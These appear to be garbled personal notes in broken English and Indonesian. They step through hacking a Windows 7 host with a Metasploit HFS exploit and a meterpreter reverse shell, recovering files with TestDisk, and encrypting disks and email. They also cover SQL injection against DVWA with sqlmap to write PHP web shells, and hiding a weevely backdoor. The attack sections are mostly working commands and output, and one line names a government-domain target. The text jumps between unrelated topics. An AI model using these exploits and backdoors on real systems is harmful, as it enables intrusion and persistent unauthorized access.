HOW TO HACK WINDOWS 7

1 OPEN TERMINAL

┌─[✗]─[root@parrot]─[/home/budhya]

└──╼ #msfconsole

2  msf > use exploit/windows/http/rejetto_hfs_exec

msf exploit(rejetto_hfs_exec) >

3 set PAYLOAD windows/meterpreter/reverse_tcp

show options

 

4 msf exploit(rejetto_hfs_exec) > set RHOST (192.168.1.102) ip target

RHOST => 192.168.1.102

5 msf exploit(rejetto_hfs_exec) > set SRVHOST 192.168.1.110 ( IP KITA)

SRVHOST => 192.168.1.110

 

6 msf exploit(rejetto_hfs_exec) > set LHOST 192.168.1.110

LHOST => 192.168.1.110

 

7 msf exploit(rejetto_hfs_exec) > set LPORT 4444

LPORT => 4444

8 msf exploit(rejetto_hfs_exec) > exploit

 

9 meterpreter > shell

Process 3180 created.

Channel 2 created.

 

10 netx for loking diterc tory

meterpreter > ls

Listing: C:\Users\monyonk\Desktop

=================================

Mode Size Type Last modified Name

---- ---- ---- ------------- ----

40777/rwxrwxrwx 0 dir 2015-09-06 22:26:18 +0700 %TEMP%

100666/rw-rw-rw- 26125 fil 2015-09-02 20:50:05 +0700 Generate-Macro.ps1

100666/rw-rw-rw- 1436 fil 2015-09-02 21:13:02 +0700 RegistryCleanup.ps1

100666/rw-rw-rw- 171 fil 2015-09-02 21:11:47 +0700 SchTaskCleanup.ps1

40777/rwxrwxrwx 0 dir 2015-08-27 17:52:27 +0700 darkcomet 5.3.1

100666/rw-rw-rw- 282 fil 2014-12-30 01:27:27 +0700 desktop.ini

40777/rwxrwxrwx 0 dir 2015-09-06 22:08:57 +0700 egy.txt

40777/rwxrwxrwx 0 dir 2015-09-06 22:09:15 +0700 egywashere

40777/rwxrwxrwx 0 dir 2015-09-06 22:12:49 +0700 egyyyyyy

100777/rwxrwxrwx 2498560 fil 2014-08-24 21:18:36 +0700 hfs.exe

40777/rwxrwxrwx 0 dir 2015-09-06 22:13:20 +0700 ijinmassayasdhmasuk

40777/rwxrwxrwx 0 dir 2015-09-06 22:25:42 +0700 koramil.exe

40777/rwxrwxrwx 0 dir 2015-09-06 22:25:41 +0700 reky

11 create new file

meterpreter > mkdir jagotarung.exe

Creating directory: jagotarung.exe

 

12 meterpreter >ls

RECAPRY DATA (PENGEMBALIAN /PENCARIAN DATA YANG TER ENKRIPSI)

DIGITAL FORENSIC

1     IDENTIFICATION
2     PERESERVATION
    - chain of custoday
    - Labeling
    -imaging/Clone(membuat kmbarannya)

3     EXAMINATION (pengujian)
4     ANALYSIS
5     REPORTING/PRODUCK
                                     APLIKASI YG BIASA D GUNAKAN
                                         a.(TESDISK)
                                         b.(AUTOPSY) biasa d buka d brouser.

┌─[budhya@parrot]─[~]

└──╼ $sudo su

[sudo] password for budhya:

┌─[root@parrot]─[/home/budhya]

└──╼ #apt-get install testdisk

Reading package lists... Done

Building dependency tree

Reading state information... Done

The following NEW packages will be installed:

testdisk

0 upgraded, 1 newly installed, 0 to remove and 151 not upgraded.

Need to get 394 kB of archives.

After this operation, 1,419 kB of additional disk space will be used.

Get:1 http://eu.repository.frozenbox.org/mirrors/debian/ jessie/main testdisk i386 6.14-3+b2 [394 kB]

Fetched 394 kB in 3s (104 kB/s)

Selecting previously unselected package testdisk.

(Reading database ... 269039 files and directories currently installed.)

Preparing to unpack .../testdisk_6.14-3+b2_i386.deb ...

Unpacking testdisk (6.14-3+b2) ...

Processing triggers for man-db (2.7.0.2-5) ...

Setting up testdisk (6.14-3+b2) …

 

┌─[root@parrot]─[/home/budhya]

└──╼ #testdisk /dev/sdb

TestDisk 6.14, Data Recovery Utility, July 2013

Christophe GRENIER <grenier@cgsecurity.org>

http://www.cgsecurity.org

┌─[root@parrot]─[/home/budhya]

└──╼ #testdisk /dev/sdb

the disk is name TOSHIBA andthan you (ENTER)

 next you seleck a intel partision and (ENTER)

 Next you seleck ANALYSE And ENTER

 Next you seleck again QUICK SEARCH And ENTER

 Next seleck CONTINUE (ENTER)

 The next you seleck (P) p is is for (list file) for looking your file in direcktory

 the next  is RED FILE in a direck tory this is a file target and copy you mas seleck (C) In a Red file 

 next selec cofy again is finished cofy  is list green copy done
  and search in your pc for paste after copy your file in your list red directory

 and seach from  deroctory pc the last paste after copy and finis

ENKRIPSI DISK AND MASSAGE /EMAIL WITH THUNDERBIRD AND VERACRYPT

open in your terminal for looking your speck in your pc
write

1  └──╼ $sudo su
[sudo] password for budhya:
┌─[root@parrot]─[/home/budhya]
└──╼ #fdisk -l

 open aplication VERACRYPT

 the next run aplication and sercg your patition in pripat

 next selet your target in pripate

 the next klick ok

 and then the next

 insert your password for vripate partition

 the finished hidden your partition


THE NEXT PRIPAT EMAIL Open the aplication THUNDERBIRD

And start seyup now

==>>the next search key generation console

simple the seckription email

the next id for email frends..

EXPLOIT DVWA AND UPLOAD BACKDOOR HIDDEN BACDOR

1.target.go.id/idex.php?id_berita=12&
Open terminal..

1.1 ┌─[budhya@parrot]─[~]
└──╼ $sudo su
[sudo] password for budhya:
┌─[root@parrot]─[/home/budhya]
└──╼ #msfconsole
                                                 

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        http://metasploit.pro


Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.3-2015062101 [core:4.11.3.pre.2015062101 api:1.0.0]]
+ -- --=[ 1463 exploits - 838 auxiliary - 229 post        ]
+ -- --=[ 428 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

┌─[root@parrot]─[/home/budhya]
└──╼ #sqlmap -l simple.txt
         _

open new terminal

┌─[✗]─[root@parrot]─[/home/budhya]

└──╼ #cd /usr/share/webshells/php
┌─[root@parrot]─[/usr/share/webshells/php]
└──╼ #

└──╼ #ls
findsock.c  php-backdoor.php  php-findsock-shell.php  php-reverse-shell.php  qsd-php-backdoor.php  simple-backdoor.php
┌─[root@parrot]─[/usr/share/webshells/php]
└──╼ #

nex  copy file 2
└──╼ #cp php-backdoor.php ~
┌─[root@parrot]─[/usr/share/webshells/php]
└──╼ #
next loking finished cofy
┌─[root@parrot]─[~]
└──╼ #pwd
/root
┌─[root@parrot]─[~]
└──╼ #ls
12 hari kmaren  Desktop          maltego_3.6.1.6748-0kali2_all.deb  New Graph (1).mtgx  sessions          Videos
9844.py         Documents        MaltegoChlorineCE.3.6.0.6640.deb   New Graph (2).mtgx  Templates         VirtualBox VMs
abuy.php        Downloads        Metasploitable2-Linux              php-backdoor.php    tmp.php           vpngate_vpn239494852.opengw.net_udp_1947.ovpn
abuy.py         HARI 8           Music                              Pictures            TUGAS MLAM INI .  vpngate_vpn800695980.opengw.net_udp_1605.ovpn
blackhat.jpg    malam ini tugas  NewFolder                          Public              ub 10.04.vdi      Wireles hacking
┌─[root@parrot]─[~]
└──╼ #

next step upload backdoor
─[✗]─[root@parrot]─[/home/budhya]
└──╼ #sqlmap -l /home/budhya/dvwaheader.txt -p "id" --file-write=/root/php-backdoor.php --file-dest=/www/dvwa/hackable/uploads/abouy.php
         _
apabila bacdoor telah berhasil di upload maka akan ada pemberitauan pada terminal

Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=gdyvv' AND (SELECT 2276 FROM(SELECT COUNT(*),CONCAT(0x716b786a71,(SELECT (CASE WHEN (2276=2276) THEN 1 ELSE 0 END)),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GfHD'='GfHD&Submit=Submit


    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=gdyvv' UNION ALL SELECT NULL,CONCAT(0x716b786a71,0x426b64424b7872745956,0x7176707171)#&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: id=gdyvv' AND (SELECT * FROM (SELECT(SLEEP(5)))vTIN) AND 'qWtS'='qWtS&Submit=Submit
---
do you want to exploit this SQL injection? [Y/n]
[22:01:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[22:01:48] [INFO] fingerprinting the back-end DBMS operating system
[22:01:49] [WARNING] reflective value(s) found and filtering out
[22:01:49] [INFO] the back-end DBMS operating system is Linux
[22:01:49] [WARNING] expect junk characters inside the file as a leftover from UNION query
do you want confirmation that the local file '/root/php-backdoor.php' has been successfully written on the back-end DBMS file system (/var/www/dvwa/hackable/uploads/abouy.php)? [Y/n]
[22:01:50] [INFO] the remote file /var/www/dvwa/hackable/uploads/abouy.php is larger than the local file /root/php-backdoor.php
[22:01:50] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-09032015_1001pm.csv'

the next is prosesing upload backdoor

the next uploading bacdor is finish

next looking for dvwa bacdoor is uploading thr next runing bacdor
search name backdoor upload
 thr simple upload bacdor the name kis abuy

 next write touch enter next ls for luking diractory

for this backdoor you create new backdor  in
http://www.r57shell.net/ from this situs you download bacdor the name c99hell the next you exstraxhere open

and the next upload again bacdor is finis download and exstrak here and rename you upload again in DVWA

after open and exstrak you rename file my sample is rename (jagotarung.php) next simple finished upload bacdor 2 and brouse loking in
 http://192.168.1.123/dvwa/jagotarung.php

the next you must delete becdor 1 ..because septy bacdor 2
hackable,upload,next cklis,,withselet.delete,konfirm

next the simple edit in html name WELCOME rename FOR JAGO TARUNG

next hidden your bacdoor bi septy
open new terminal write
┌─[root@parrot]─[/home/budhya]
└──╼ # weevely generate 12345 tarung.php

the next lalu enter kalo ber hasil maka mun cul
[generate.php] Backdoor file 'tarung.php' created with password '12345'

 ┌─[root@parrot]─[/home/budhya]
└──╼ #cat tarung.php
<?php

thr cext copy is url file
is blokinng in image

and paste in editor BACDOOR DVWA

the next is SAVE and loking in terminal

copy ulr and wrait in terminal
http://192.168.1.123/dvwa/index.php 12345 (12345 is password)

if you loking for hidden your file you wrait ls.......finis.